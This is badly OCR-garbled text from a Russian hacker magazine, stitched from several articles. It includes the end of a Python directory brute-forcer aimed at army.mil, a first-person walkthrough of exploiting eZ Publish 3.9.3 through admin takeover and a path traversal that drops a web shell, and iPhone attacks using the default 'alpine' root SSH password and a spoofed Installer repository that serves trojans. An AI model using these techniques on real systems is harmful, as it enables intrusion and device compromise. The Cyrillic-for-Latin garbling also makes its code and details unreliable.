й = йРбрІіЬ . НТТР (йозб ) 
й.рибгериезб ( ' НЕАВ ' , р) 

Н . риДНеабег ( ' Нозб ' , НозД) 

Н . риДНеабег ( ' АссерД ' , ' ДехД /НДтІ ' ) 

Н . риДНеабег ( ' АссерД ' , ' ДехД /ріаіп ' ) 

Н. епбНеабегз ( ) 

еггсобе, еггтзд, Неабегз = Н . деДгерІу ( ) 

ІД (еггсобе==200) апб ( Іеп (Неабегз ) ! =0 ) : 
бігез . аррепб (р) 
ехсерД : 
разз 

# задаем функцию для анализа файла гоЬоДз.ДхД, по кото- 
рому очень часто можно определить закрытые от индексации 
директории , например , так : 

беД гоЬоДз (ДюзД ) : 
дІоЬаІ бігез 
Дгу : 

Д = игІІіЬ .игіореп ( ' НДДр : / / ' +ДюзД+ ' /гоЬоДз . ДхД ' ) 
Ііпе = Д . геаб ( ) 

ДхД = ге . Діпбаіі ( ' Віза11оѵ7: (.*)$', зДг(Ііпе), 
ге.МВЕТІЕІЫЕ) 

Дог і іп ДхД : 

іДі=='/' огі=='/\г': 
разз 
еізе : 



# основная функция, которая будет по заданной таблице 
прогонять всю колонку директорий и передавать на скорм- 
ление двум предыдущим функциям через потоки 
беД бігз (ДюзД) : 
дІоЬаІ бігез 

сопп = здІіДеЗ . соппесД ( ' бЬ ' ) 
с = сопп. сигзог ( ) 

с . ехесиДе ( ' ЗЕЕЕСТ * ЕКОМ ВігесДогіез ' ) 

Дог гоѵ^ іп с : 

ДНгеаб. зДагД_пеѵ^_Д]тгеаб (сііеск, (ДюзД, гоѵ^[1] ) ) 
Дкгеаб. зДагД_пеѵ7_ДДігеаб (гоЬоДз , (ДюзД,) ) 

# на вооружение руДДюп-кодерам: вот так можно очень 
просто избавиться от повторений в списках 

ІізД ( зеД (бігез ) ) 

# выполняем алфавитную сортировку 
Іосаіе . зеДІосаІе ( Іосаіе . ЕС_АЕЕ , ' ' ) 

Дтр = [х. зѵ7арсазе ( ) Дог х іп ІізД ( зеД (бігез )) ] 

Дтр . зогД (кеу=1оса1е . зДгхДгт) 

Дтр = [х. зѵ7арсазе ( ) Дог х іп Дтр] 
геДигп Дтр 



бігз ( ' агту . тіі ' ) 



Другая тулза, о которой следует поговорить подробнее — 0ѴѴ5Р 
ОігЬизІег (о ней нетакдавно рассказал еНее). Это многопоточная ути- 
лита, написанная на ЗАѴА. Предназначена она для брута сабдоменных 
имен и директорий (в том числе, директорий известныхѴѴЕВ-прило- 
жен и й]. Официальный сайт проекта — оѵѵазр.огд/іпбех.рбр/СаІедогѵ: 
0ѴѴА5Р РігВизІег Рго]есД Синтаксис запуска выглядиттак: ^аѵа 
-^аг ВігВизДег-0 ,12.^аг -Н -иДіДДрз://127.0.0.1/(в консоли) 
и ^ аѵа - ^ аг ВігВизДег-0 ,12.оаг -и ДіДДрз://127. 0.0. 1/(001- 
режим). 

Зачем это юзать? Дело в том, что зачастую проверки кода ответа по 
«200» недостаточно, чтобы прошарить наличие директории, пото- 
му как на несуществующие директории он тоже может приходить, 
выдавая при этом страничку с описанием ошибки, подготовленную 
разработчиками. Втаком случае требуется анализировать нетолько 
код, но и контент, что, кслову, умеетэта программа. На официальном 
сайте можно найти огромные листы для брута (самый большой из них 
насчитывает около 1 273819 директорий). 

Н МОРАЛЬ СЕЙ БАСНИ 

Даже такие серьезные и маститые проекты, какофициальный сайт 
Армии США, имеют банальные бреши в уязвимости. Помни, что все 
описанное в статье было проделано исключительно как часть жур- 
налистского расследования, и не стоит повторять эти действия ради 
забавы. Играться с сайтами военного и государственного сектора 
может быть опасно. ^ 
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элегант ный взлом 

^М5Е2'РиВЫ5Н 

ВАГОН БАГОВ в ПОПУЛЯРНОЙ СМ5 

ІБылоужез а полночь, когда в аську мне от старого знакомого прилетело соо^ 
Іщение со с сылкой на один ѵѵеЬ-узел в интернете. В сообщении гов^илос ь, что в 



Інастояпще время проводятся работы по анализу защищенности этого ресурса. 



|И если у ме ня есть желание поучаствовать, то моя помощь была б ы крайне полез- 

Іна.І 



оуказанной ссылке моему взору предстал симпатичный сайт 
с убогой навигацией. Поглумившись немного над дизайном, 
исследования я начал по стандартной схеме — с поиска 
наиболее опасных багов на стороне сервера. При обраще- 
нии к новостному разделу сразуже бросилось в глаза использование 
тоб_геѵѵгі1:е, который порой затрудняет эксплуатацию ряда наиболее ин- 
тересных зегѵег-зібе уязвимостей. Поверхностный серфинг по структуре 
сайта показал, что никакими 501-инъекциями и прочими вкусностями тут 
и не пахнет. Это лишь подогревало интерес к поискууязвимостей. 
Продолжая исследование сайта, в НТМІ-коде различных его разделов 
я наткнулся на интересную строку: сопСепС= " е2 риЫізІі" . Гугление 
по сигнатуре показало, что ресурс, видимо, базируется на Ореп зоигсе 
СМ5 е^РиЫізЬ. Через пару минут предположение получило подтверж- 
дение. Стоило мне обратиться кстранице/егіпІо/аЬоиІ:, сервер выплю- 
нул точную версию СМ5 со всеми установленными дополнениями. Это 
была е^РиЫізЬ версии 3.9.3. 

На офсайте разработчика этой СМ5 аккуратно собраны уязвимости под 
старые версии движек (что крайне приятно). Интересными багами в 
е^РиЫізЬ, надо сказать, были уязвимости, связанные с поднятием при- 
вилегий (ргіѵііеде езсаіабоп). Таких оказалось аж целых две. Но, как это 
обычно бывает, в бюллетенях безопасности сведения, раскрывающие их 
эксплуатацию, отсутствовали. Блуждания по багтрекам также результатов 
не принесли. 



Недолго думая, софсайта была стянута уязвимая версия СМ5, аналогич- 
ная той, что использовалась на исследуемом ресурсе, с целью проведе- 
ниятестирования движки на уровне ѵѵЬТе-Ьох. Послезагрузки комбо- 
инсталлятора «Аи-Іп-Опе» сумным видом началасьустановка продукта, 
которая сводилась к многократному прохождению диалогов аля «Мехі:». 
Затем браузер отобразил диалогустановки нового сайта. Вскоре в моем 
распоряжении был полигон для тестирования. 

В ПЕРВЫЙ ВЗГЛЯД НА ПАЦИЕНТА 

Послетого, как приложение было развернуто втестовой среде, браузер 
как-то машинально оказался в панели администрирования сайтом. 
Покопавшисьтам немного, я включил отладочный режим, который поз- 
волял видеть в браузере все запросы, передаваемые к БД в процессе 
серфинга по сайту. Также это позволяло отслеживать логику работы 
приложения. 

Беглый осмотр админки показал, что могут возникнуть сложности на эта- 
пе организации ѵѵеЬ-зЬеи, так как СМ5 не позволяет работать непосредс- 
твенно с серверным кодом (читай — РНР). Приложение предусматривало 
работу с сайтом только на уровне его контента. По большому счету это 
правильно, но для целей проникновения, безусловно, не есть гуд. 

Другое разочарование было связано с файлом «.Ыассезз» в корневой 
директории \л/еЬ-сервера, который содержал следующие директивы: 
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е2 сІеЬид 



СІеаг сасИе: 



АІІ сасЬез 



а«аг 



Оиіск зеНіпдб: 

Ш\ ОеЬид оиіри! 

Ш ОеЬид гесіігесііап 
□ ТетрЫе сІеЬид 
Ш\ Іліше (етріаіе <1еЬид 

О ІІ5! оГ Ц5е<1 Іетр!аШ5 

121 ^01 СІеЬид оисриі 

Гі^ 



Ноіісе; еІМу5РІОБ;:диегу(0.000 т&) диегу питЬег рег раде^О 

5ЕТ NАМЕ5 

Моіісе: еТМу^0ЮВ::диету(1 гоѵѵб» 0,445 гпб) диегу лиглЬег рег радеіі 
ЗЕЬЕСТ 1с1, е^ігасіоп сіісіе ЕЯОМ ШіЕІ^ дезаіол кеу='с^ 



Использование отладочного режима 



и 5 вг/$иссе 5 » 

Узег геді 8 ІегесІ 



ссоипі ѵѵаз зиссеззіиііѵ сгеаіесі. Ап етаіі ѵѵіП Ье зеШ Іо іЬе з 



Ѵоиг? 

ас1іѵа(е уоиг ассоип! 



ЯЯцЯЯЕЯЯГЙЯ РоІІо^ іИе іпзігисііопз іп (Ьа( етаіі !о 



Успешная регистрация пользователя 



•2 РIIЫ^>к^ Зиррол ниі Зіпісіі ЗЫІѵяг* Зоіиікн» Сшіопнп РіЛпт Ом 
• г 0 іѵ«і 9 |»г г нпгСг ( «шЛу | 4 ун[ 1 лн і *і риЬНІѵ 3.9 і «гиг^Об^йОЗ: Івпя кігщілд та^а рп- 

Е23А-2008-003: ІлзиШсіепІ Тогт Ьапсіітд тасіе 
ргіѵііеде евсаіаііоп роз^іЫе. 

5»и1у: ИірГ» ѴѴНпн4іу ІЗ АидиіІ ЗШ 

Ѵеп(оп9 е(№с№4 ' Цфнйѵчі^ іп 

>=3,5.« 3,9.1Э.іОЛ-і,(И 

Т>м пдіишки ѵйж (/и»г/»діі№) іІІт*[1 іп Иіаск9г. Ьу ігапіриІіАіпя^опп піиіі. Ха 
роіілиіііу (по^іі^ іяійпд иііп . Т1н> соіМ I•нI Іо ол •каІЛіол ргіѵііідві. 

* Рог тога іігіоггглііні аЬйиі аЛісінІ мпіапБ но юрйПвсІ. зоо іМз (н^о 

Уведомление обиізвимости на офсайте разработчика СМд 



<Рі1езМаСс1і " . 

огсіег а11оѵт,сіепу 
(іепу Ргот а11 
</Рі1езМаЦс}і> 

<Рі1езМа1:с}і " ( іпсіех\ . ріір | \ 

. (діР I зре?д I рпд | сзз I з з I ІіРтІ) | ѵаг ( . + ) зСогаде . 
рйР ( . + ) \ .рсіР) $ "> 
огсіег а11оѵт,(іепу 
аііоѵт Ргот а11 
</Рі1езМаЦс1і> 

КеѵтгіСеРпдіпе Оп 

КеѵтгіСеКиІе !\. (діР I тре?д I рпд | сзз И з I ІтСтІ ) |ѵ 
аг ( . + ) зСогаде .рсіР ( . + ) \ .рсіР$ іпсіех.рЬр 

Наличие подобной конс|тигурации свидетельствует о невоз- 
можности обращения к каким-либо с|)айлам в пространстве 
ѵѵеЬ-сервера в обходлогики его работы. Отсюда вытекает 
два неприятных момента для атакующего. Во-первых, 



невозможно воспользоваться уязвимостями путем прямого 
обращения ксерверным сценариям, в которых не проис- 
ходят соответствующие проверки. Во-вторых, возникают 
трудности при заливке и использовании ѵѵеЬ-збеи (обра- 
титься кнему напрямую не получится). 

Заоблачных перспектив по проведению успешной атаки не 
предвещал и поверхностный взгляд на исходный код при- 
ложения. Разработчики этой СМ5, видимо, не понаслышке 
знакомы стемой безопасного ѵѵеЬ-программирования. Но 
что-то подсказывало: свои косяки есть и тут, надо только 
лучше их разглядеть. 

Вернувшись на офсайте^РиЫізб и перейдя на страницу с 
абѵізогу, я стал выбирать мишень для атаки. Из всего, что 
тут располагалось, меня привлеклоуведомление «Недо- 
статочная обработка формы сделала возможным поднятие 
привилегии». В бюллетене также говорилось, что уязви- 
мость связана с регистрацией нового пользователя. Ну что 
ж, посмотрим на этот процесс поближе. 

Запустив ОѴѴАЗРѴѴеЬЗсагаЬ (кстати, рекомендую к исполь- 
зованию!) и настроив его в качестве локального прокси, я 
обратился кстранице регистрации нового пользователя. 
Стоило мне вбить в форму регистрации произвольные 
данные, как браузер редиректом перешел на страницу 
/изег/зиссезз, где сообщалось, что процесс завершился 
успешно и дальнейшие инструкции высланы на указанный 
мной при регистрации е-таіі. Здорово! Воттолько 5МТР- 
транспорт в моем случае настроен не был, да и тестовый 
полигон находился в автономной сети. Казалось бы, сразу 
имеетсмысл по сорцам приложения подглядеть, каким об- 
разом происходитактивация нового пользователя, — если 
бы не одно «но». 

Когда я просматривал процесс регистрации пользователя 
через ѴѴеЬЗсагаЬ, внимание мое привлекли нестандар- 
тные имена идентификаторов формы, передаваемой 
серверу. Заключалась нестандартность в том, что на 




> ІП^О 

• При исследовании 
ѵѵеЬ-приложений 
методом ѵѵбКе-Ьох 
крайне полезно 
включение различ- 
ных отладочных 
режимов. 

• Функция ткбтеО 
возвращает метку 
времени Ппіх, 
соответствующую це- 
ломучислу, равному 
разнице в секундах 
между заданной 
датой/временем и 
началом Эпохи Ппіх 
(Тбе Ппіх Еросб, 1 
января 1 970 г). 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно 
с целью ознаком- 
ления! Ни автор, ни 
редакция за твои 
действия при исполь- 
зовании описанных 
уязвимостей ответст- 
венности не несут! 
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Спасибо за регистрацию на сайте ѣезѣ.ста. 

Рінформация о Вашей учетной записи 
Имя пользователя ; ег^Наск 
Е-шаіІ : 

Пароль: 12345678 



Асііѵаіе ассоипі 

Уоиг ассоип! ів поѵѵ асііѵаіесі. 
ок I 



Зепсі ЪЫз Ііпк Ьо 1± уои сопіігж Ыѵіз ассоипѣ; 

ПЬЬр: / /Ь^зЬ - стз/изег/асЪіѵа^е/8а218Ьс5'7ЬЬ30а7сі9Ь02^305ЬеЗЬ^6€3 



.ктивация учетной записи администратора 




концах имен параметров формы использовались цифровые значе- 
ния, в которых явно прослеживалась прямая последовательность. 
Крометого, интересным моментом былото, что в форме присутствовал 
скрытый параметр с именем изегШ, который соответствовал внут- 
реннему идентификатору пользователя в таблице «егизег» мускуля. 
Стоит отметить, что идентификатор первого администратора является 
постоянным для всех версий этой СМ 5. Это так, к слову. 

Послетого, как процесс регистрации был повторен для другого поль- 
зователя, а данные форм при регистрации первого и второго пользо- 
вателей сравнены, догадка подтвердилась: идентификаторы формы 
были последовательными. Улавливаешь ход мысли, откуда ноги растут 
у адвизори? Именно! Обладая этой информацией, несложно посчитать, 
какие данные должны бытьуказаны при регистрации администратора с 
постоянным внутренним идентификатором. На скорую руку я прикрутил 
5МТР-транспорткСМ5 и отправил сырой Р05Т-запрос на регистрацию 
аккаунта с идентификатором дефолтового администратора с известным 
мне адресом электронной почты и паролем. На мейл свалилось письмо, 
содержащее ссылку для активации этого пользователя. Пользователь 
был успешно активирован, итаким образом получен доступ кСМЭс 
правами администратора в ней. 

Однако радость длилась недолго. Хотя я натравил сплоит на сайт, 
с которого все началось, письмо, содержащее ссылку активации 
администратора с заданным мною паролем, упорно не приходило. 
По всей видимости, это могло означать, что на Іагдеі-ресурсе почта 
во внешний мир не ходила (либо вообще не настроена). В от та к вот, 
халява прошла стороной. И с этими мыслями я погрузился в сорцы 
СМ5. 



Ш ТАК РОЖДАЮТСЯ 2ЕКО-ОАУ 

В первую очередь я принялся изучать модули, связанные с процессами 
аутентификации и авторизации. И в процессе этого творческого мероп- 
риятия наткнулся на интересный участок кода: 

і^( $Цуре == Е2_иЗЕК_РАЗЗШКБ_НАЗН_МВ5_иЗЕК ) 

{ 

$зДг = тсі5 ( " $изег\п$раззѵ\?огсі" ) ; 

} 

Это код создания хеша, по которому происходит процесс аутентификации. 
То, что в качестве «соли» используется имя пользователя, — практика 
распространенная и ей уже никого неудивишь. В качестве разделителя 
используется символ перевода строки, вследствие чего инструменты, 
которыми мы привыкли пользоваться, откровенно лажают (таккакв них не 
предусмотрен подобный фичесет). Так, например, ІпзібеРго Раззѵѵогб Рго 
идетлесом и при встрече с подобными хешами приходится писатьсвой 
брутфорсер. Добравшись до процесса активации нового пользователя и 
лицезрев код, представленный ниже, я не смогсдержать ухмылки: 

// СгеаДе епаЫе ассоипД Ііазіі апсі зегкТ ІД До Дііе пеѵ^іу 
гедізДегесі изег 

$]таз]т = тсі5 ( ткДіте ( ) . $изег->аДДгіЬиДе ( 

' сопДепДоЬ^ есД_ісі ' ) 

В этих строках кода содержится уязвимость, которая связана с зависи- 
мостью функции ткбте( ) от времени, установленного на ѵѵеЬ-сервере. 
Значение ‘соп1:еп1;оЬ]ес1;_іб’ — это идентификатор пользователя в базе, 
который последовательно меняется при регистрации новых пользова- 
телей. Таким образом, зная время на удаленном сервере с еХРиЫізЬ, 
можно достаточно тривиально активировать учетную запись без получе- 
ния активационной ссылки на мейл. Установленное время на удаленном 
сервере передается каждый раз в заголовках пакетов НТТР, возвращае- 
мых сервером, поэтому проблем тут также не возникает. 

На основе этих данных был написан сплоит, который меняетпароль 
администратора СМ5 и активируетего учетную запись. В этот раз удача 
была на моей стороне, и я легко получил доступ с правами администра- 
тора еХРиЫізЬ на сервере клиента. 

Ш СПУСКАЕМСЯ НА УРОВЕНЬ ОСИ 

Помнишь, в самом начале говорилось, что еХРиЫізЬ не позволяет ре- 
дактировать РНР? Вотоб этом я и вспомнил, оказавшись внутри СМ5 под 
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Использование двух уязвимостей в е^РиЫізЬ для получения привилегий администратора 




I о НМр:/Лей.сті/е2ІлІо/вЬоіі1?ст (і=іА^Ноаті 
Файл Правка Вцд Избранное Сервис Справка 




О АЬоиІ/ ІпГо - ШеЬ5і4еітеі^асе 



й ’ 0 



пі. аиЕ^НогігуЧэуэгеш 



Ет Йу2 



СОМРАМѴІОСО 

Ѵоиг сотропу 5 І 09 СІП Ііеге 




X Поиск ііѵе5еагсЬ' 



' Стрвнимв ▼ Сервис 



Іоаііі Кеаійіег 5Ие тар Таа скиіД 



Ргиіисіа 5оІи1іопз 
кіГо/АЬоиІ 



Тгаіпіпд Зиррогі ОеіИпд віагіесі СоілтипШвз Сотрапу 



> СІѴСІ 

На нашем дискеты 
найдешь рос-код для 
эксплуатации уязви- 
мостей, описанных 
в статье. 



ѳ2 РиЫізЬ іпТогтаІіоп: 3.9.3 



е2 РиЫІзІі 

ѴѴІіа! ІБ еі РиЫІ! 



Щ С\Ѵ№иййм^%зІіт^^ 



аш]х] 



Е :\ТвРір>рЬр о2РиЫі&Ь_!ВІніве_р(_{ішпсііапа1і^2^_7его_!і1а2^.р1ір -и-лйиіп ^-12345678 - ж| 
-Кб бр : //без б.сіів^в2іівЬіл^іба_а^іп/ ' 



Выполнение произвольных команд на сервеЙІ 



админом. Можно было бы остановиться на достигнутом, ноу меня появи- 
лосьжелание спуститься еще ниже: до выполнения команд на сервере. 
Вновь, ноуже более пристально и внимательно, я пробежался по админ- 
ке. Для себя отметил, что может получиться реализовать идеи выполне- 
ния произвольного РНР-кода путем изменения переменных окружения 
СМ5. Но эту затею я решил оставить на крайний случай. Наиболее прос- 
тым решением получения шелла казалась установка пакетов е^РиЫізЬ, 
возможность чего присутствовала в панели администратора. 
Обратившисьуже в который раз кофсайту е^РиЫізЬ, я проследовал к 
репозитарию доступных пакетов для загрузки под исследуемую версию 
и слил к себе на машину пару готовых примеров. Полученные файлы 
имели загадочное расширение «егркд». Стоило изменитьего на « 2 Ір», 
какфайлы без проблем открылись — в них содержалось еще по одному 
файлу с расширением «егркд». Проделав аналогичную операцию с вло- 
жениями, я увидел обычный структурированный каталог, содержащий 
различные файлы (в том числе, с расширениями РНР), в корне которого 
находился файл «раскаде.хті». 

После установки пакета на тестовый сервер е^РиЫізЬ, кроме появления 
нового каталога в структуре ѵѵеЬ-сервера и надписи в разделе админис- 
трирования СМ5 отом, что в системе установлен такой-то пакет, никаких 
изменений не произошло. Немного осмотревшись, я просто добавил в 
разобранный пакет свой шелл и файл «.Ыассезз», в котором переопре- 
делил РіІезМаІсЬ и отключил РеѵѵгіІеЕпдіпе. Затем залил этотзаряжен- 
ный пакет на многострадальный обследуемый сервер, но меня ждало 



новое разочарование — в конфигурации арасЬе присутствовала дирек- 
тива «АНоѵѵОѵеггібе Мопе», и переопределить директивы «РіІезМаІсЬ» с 
использованием файла «.Ыассезз» не представлялось возможным. 

Еще немного времени было потрачено на анализ процесса заливки 
файла и разбор файла «хті», содержащегося в пакете. Это позволило вы- 
явить уязвимостьтипа «Обход каталога» (РаіЬ ІгаѵегзаО, которая связана 
с обработкой файла «раскаде.хті». Предполагая, что некоторые файлы 
на ѵѵеЬ-сервере могутбыть перезаписаны, я подготовил новый пакет, 
который должен был при установке перезаписать файл «егіпІо.рЬр». 

Стало возможным, не выходя за рамки логики работы приложения и ис- 
пользуя уязвимости на разных этапах его функционирования, получить 
доступ к командной строке оси. Фактически это позволяетскомпромети- 
ровать весьѵѵеЬ-сервер. В моем случае были получены права арасЬе, и 
хотя используемое ядро на исследуемом ресурсе позволяло подняться 
до рута, делать я этого не стал, так как эти действия уже выходили за 
рамки анализа защищенности ѵѵеЬ-приложения. Поэтому я отписался о 
своих результатах коллеге по цеху и с чувством глубокого удовлетворения 
потопал спать. 

Н ЗАНАВЕС 

Не одними 50Е- инъекциями, Еііе-инклудингом и прочими пряниками 
насыщен мирѵѵеЬ’а. Найдется место и более экзотическим багам, кото- 
рые в совокупности порой позволяют добиться высоких результатов при 
проникновении. Помни об этом. И удачи тебе в исследованиях! ^ 
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ЯБЛОЧНОЕ 
ПЮРЕ 



ТАКУЕМ АРРІЕ 



Одним прек расным дне ^^и^вид^^еволюцию в области мобильных теле- 
фонов, Знаменитая Арріе - мать всех макинтошей и айподов в придачу - вы- 
пустила на рынок свой первый Арріе ійюпе. Невероятно удобный графичес- 
кий интерфейс, большой экран, мощное железо и всего четыре кнопки! 

Но самое главное, что было в новом телефоне — операционная система. 
Настоящий Шіх Ьазесі, сіагѵѵіп кегпеіі Она так и призывала к экспериментам. 



в ІРНОНЕ 36: «ПРОЩАЙТЕ, ХАКЕРЫ !>> 

Первая модельтелефона еще неуспела состариться, какАррІе выпустила 
на рынок новый іРЬопе Зд. Отличий этой модели отсвоего предшествен- 
ника всего три: 65М-контроллер с поддержкой Зд, А-6Р5 навигационный 
контроллер и корпус. Само собой разумеется, новое железо потребовало 
новой прошивки, и свет увидел вторую ветку фирмварей. Я не буду под- 
робно описывать все фичи этих прошивок, их можно без труда найти в 
инете. Скажу только, что обещанного копи-паста так и не сделали (на мо- 
мент написания этой статьи последняя прошивка — 2.2). 

Вышел и официальный 5СК, и репозиторий-магазин Арріе 5іоге. Вторая 
ветка была зарелизена и для первого поколения телефонов, поэтому все 



новые программы универсальны. Разумеется, хакеры не заставили себя 
ждать и выпустили под новые прошивки анлоки и джеилбрейки. 

Самой популярной программой для разблокировки іРЬопе стала 
ѴѴіпРѴѴМ. 

Вместе с разблокировкой предлагается поставить менеджеры пакетов 
Іпзіаііег (уже 4-ая версия самого первого менеджера) и Субіа (менед- 
жер пакетов на базе ВеЬіап раскаде). В неофициальных репозиториях 
можно найти вкусные патчи и дополнения, утилиты и хаки, которых нет 
в Арріе 5іоге. Поэтому Іпзіаііег и Субіа до сих пор пользуются попу- 
лярностью, и списывать со счетов атаки на эти приложения смысла 
не имеет. 
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■V’ Л" і Рекурсия в отображении іі'гаппе с пустым или невалидным зге 
- 

Н АТАКА 0.55НООЕРДиіТ 

Самая нетрудная и самая действенная атака. Идея проста, какдва байта: 
многие пользователи іРбопе устанавливают 55Н-демон, даже не подоз- 
ревая, зачем он нужен. Он используется, например, в программе іРбопе 
Шппеі, с помощью которой эмулируется С5В пеіѵѵогк. Другие пользова- 
тели специально ставят 55Н0, но поменять пароль по умолчанию не счи- 
тают нужным (или попростуленятся). Вотлистингфайла /еСс/тазСег . 
раззхѵсі: 



## 

# Пзег ВаСаЬазе 

# 

# ТЫз :Еі1е із Ыіе аиЫіогіСаСіѵе изег сіаСаЬазе. 

## 

поЬосіу : * : -2 : -2 : : О : О : Ппргіѵііедесі ІТзег : /ѵаг/етрСу : /изг/Ьіп/ 
:Еа1зе 

гооС : /зтх7МУТ0Іі2М: О : О : : О : О : ЗузСет АйтіпізСгаСог : /ѵаг/ 

гооС : /Ып/зЬ 

тоЬіІе : /зтх7МУТ0Іі2М: 501:501: : 0 : 0 :МоЫ1е1Тзег : /ѵаг/тоЫІе : / 
Ып/зЬ 

Цаетоп :0:0: ЗузСет Зегѵісез : /ѵаг/гооС : /изг/Ып/ Іаізе 

_зесигіСусі: * : 64 : 64 : : 0 : 0 : зесигіСусі: /ѵаг/етрСу : /изг/Ып/ 
Іаізе 

_тсіпзгезропсіег :*:б5:б5: :0:0 : тВЫЗЕезропсіег : /ѵаг/етрСу : /изг/ 
Ып/ Іаізе 

_зз1і(і: * : 75 : 75 : : о : о : ззЬсі Ргіѵііеде зерагаСіоп : /ѵаг/етрСу : / 
изг/Ып/1а1зе 

_ипкпомп: *:99:99: :0:0 :Шкпоѵ^7П Взег : /ѵаг/етрСу : /изг/Ып/ 
Іаізе 
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Е)тображение док ументов внуіри почтовика. Интересно, кактам выполН 
дяются макросы :]| 



За хэшам и скрывается ма ги ческое сл ово а [ріпе. Таким образом, получаем 
две связки логин-пароль, с которыми вероятнее всего пустит на іРбопе 
с открытым 22 портом: тоЬіІе/аІріпе и гооі/аіріпе. Неслабо? Да, вот так 
сразу — рутовый доступ, без лишних проблем. Не стоит считать, что найти 
такую«халяву» наулицахтяжело. Поверь мне: сделатьэто гораздо проще, 
чем можно было бы подумать (такое раздолье и заставило меня описать 
эту тупую и незатейливую атаку). Даже сейчас, когда больше половины 
іРбопе — белые Зд ототечественных операторов, открытый порт 22 далеко 
не редкость. 

Н АТАКА 1.ІЫ5ТАІІЕККЕР05ІТ0КУ5Р00РІМ6 

Идея этой атаки пришла мне в голову, когда я первый раз взглянул 
на менеджер пакетов Іпзіаиег от ВірВеѵ. Соль в том, чтобы создать 
поддельный репозиторий на базе обычного веб-сервера (например, 
встроенного в любую точкудоступа уреза иного бирб из ЬизуЬох). Затем 
прописать ОМЗ-запись с оригинальным именем репозитория разра- 
ботчика и ІР-адресом нашего веб-сервера (тоже решается средства- 
ми Ьизу Ьох). После этого ІР боне- пользователи, присоединившиеся к 
нашему вкусному бесплатному хотспоту (который для пущей красоты 
можно назвать как-нибудь типа 6об[еп_ѴѴіб :)) и обновившие свои 
программы, получат вместо них похаканные мобильные трояны. Ре- 
позиторий представляет собой хті-конфиги и 2 Ір-файлы с програм- 
мами. Никакой подписи пакетов и проверки целостности, спуффинг 
в чистом виде. Итак, начнем! Скачиваем оригинальные скрипты для 
создания репозитория: 

ІіЦЦр : //і . гірсіеѵ. сот/зеесі/геро-г1050 . 2 Ір 
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Пзег : /ѵаг /етрСу : /изг/Ып/ 



Остается лишь найти приложение, которое заведомо будет установле- 

► 057 




вим пара метры -ключ и сіаіеиѵегзіоп на произвольные числа, 
заведомо больше данных. Теперь перейдем к хті-конфигу 
из ключа игі: 



<?хт1 ѵегзіоп= " 1 . О " епсосііпд= "ІІТР-8 " ?> 

<!В0СТУРЕр1ізД РВВЫС "-//Арріе СотриСег / /ВТВ РЫЗТ 1.0// 
ЕВ" "ІіРРр: //ѵллпл?. арріе . сот/ВТВз/РгорегСуЫзЕ-! . 0 .сіЕ(1"> 
<р1ізВ ѵегзіоп= " 1 . о " > 

<сіісВ> 

<кеу>і(1епРіТіег</кеу> 

<зкгіпд>сот. гірсіеѵ . іпзка11</зкгіпд> 

<кеу>пате</кеу> 

<зЕгіпд>Іпз1:а11ег</зкгіпд> 

<кеу>ѵегзіоп</кеу> 

<зкгіпд>4 . 0</зЕгіпд> 

<кеу>(іезсгіркіоп</кеу> 

<зкгіпд>ТНЕ ІпзЕаІІег. Воѵ^ хтТкк гезитеаЫе сіоѵ^піоасіз , 
орСітізесі апсі Еезкесі Тог 2.1 апсі 2.2, геЬиіІсіз іпзТаІІесі 
аррз оп Тке Тіу, зиррогТз ргохіез, Виа зсгірТіпд Іапдиаде 
апсі тоге ! 

Еіпаі геіеазе. Іпсіисіез Епдіізк, Еиззіап апсі Вкгапіап 
ІосаІігаТіопз . 

</зТгіпд> 

<кеу>ісоп</кеу> 

<зТгіпд>кТТр : //і . гірсіеѵ. сот/іпТо/ісопз/сот. гірсіеѵ. 
іпзТа11-4 . о .рпд</зТгіпд> 

<кеу>зІ 2 е</кеу> 

<іпТедег>5б5б35</іпТедег> 

<кеу>каз]т</кеу> 

<зТгіпд>Зсі91бЬЗсіб0с5с31сббеб52 Т2с5711832</зТгіпд> 
<кеу>1осаТіоп</кеу> 

<зТгіпд>]тТТр : //і . гірсіеѵ. сот/раскадез/ЗузТет/іпзТа11ег- 
40 . 2 Ір</зТгіпд> 

</сіісТ> 

</р1ізТ> 



Исправим ключ ѵегзіоп на такой же, который выставили в предыдущем 
с|)айле. Изменим ключ зіге, чтобы он соответствовал размеру хакнутого 
с|)айла приложения. Последний штрих — ключ ЬазЬ. Смотрим скачанный 
исходник репозитория гедепегаІе.рЬр: 



$г [ ' казк ' ] = тсі5_Ті1е ( $Ти11раТ]т) ; 



Видим, как все просто, никаких наворотов. Снимаем хэш отлже-приложе- 
ния и кладем в значение ключа. Все готово, опционально можно испра- 
вить еще и игі-ключ — это уже ничего не изменит. Думаю, тема раскрыта. 
Стом, каксоздатьтроян для іРЬопе и что для этого потребуется, я постара- 
юсь рассказать в следующих статьях. 



Н АТАКА2.ЕХРЮІТ5 

Уязвимости в основном найдены в веб-браузере Ваіагі и почтовике. Во 
многом ошибки повторяют найденные ранее в версиях под МасОз. Ком- 
ментарии на этутему можно найти в их исходных кодах. 

Первой ласточкой стала ошибка в библиотеке ИЬСк, существовав- 
шая на первом поколении телефонов и благополучно исправленная 
во вторых прошивках. Далее исследователи копали главным обра- 
зом ]аѵа5Сгір1:-процессор. Благо, тут было на что опираться: движок 
ѴѴеЬКіІ: перелопатили, еще когда іРЬопе и в проекте не было, поэтому 
на работок хоть пруд пруди. Я умышленно не буду подробно разбирать 
существующие экспойты для іРЬопе. Во-первых, хочется посвятить 
этому отдельную статью. Во-вторых, пока будет логичным разобрать- 
ся с более простыми атаками. Можешь попробовать готовые реали- 
зации: 



взлом 



Отличное применение отличномутелефон 



но у всех пользователей. Нетрудно догадаться, что таким является сам 
Іпзіаиег. Вот оригинальный конфиг производителя Ьир://і.гірсІеѵ.сопп/ 
іпЬ/іпбех-2.2.р[І5к а вернее, та его часть, которая отвечаетза эту софтину: 



<(ііск> 

<кеу>сакедогу</кеу> 

<зкгіпд>3уз1:ет</зкгіпд> 

<кеу>(іаке</кеу> 

<зкгіпд>1232132 8б4</з1ігіпд> 

<кеу>і(іепкі1іег</кеу> 

<зкгіпд>сот. гірсіеѵ. іпзка11</зкгіпд> 

<кеу>пате</кеу> 

<зкгіпд>ІпзЦа11ег</зЦгіпд> 

<кеу>ѵегзіоп</кеу> 

<зкгіпд>4 . 0</зкгіпд> 

<кеу>(іезсгіркіоп</кеу> 

<зкгіпд>ТНЕ ІпзСаІІег. гезшпеаЫе сіоѵ^піоасіз , 

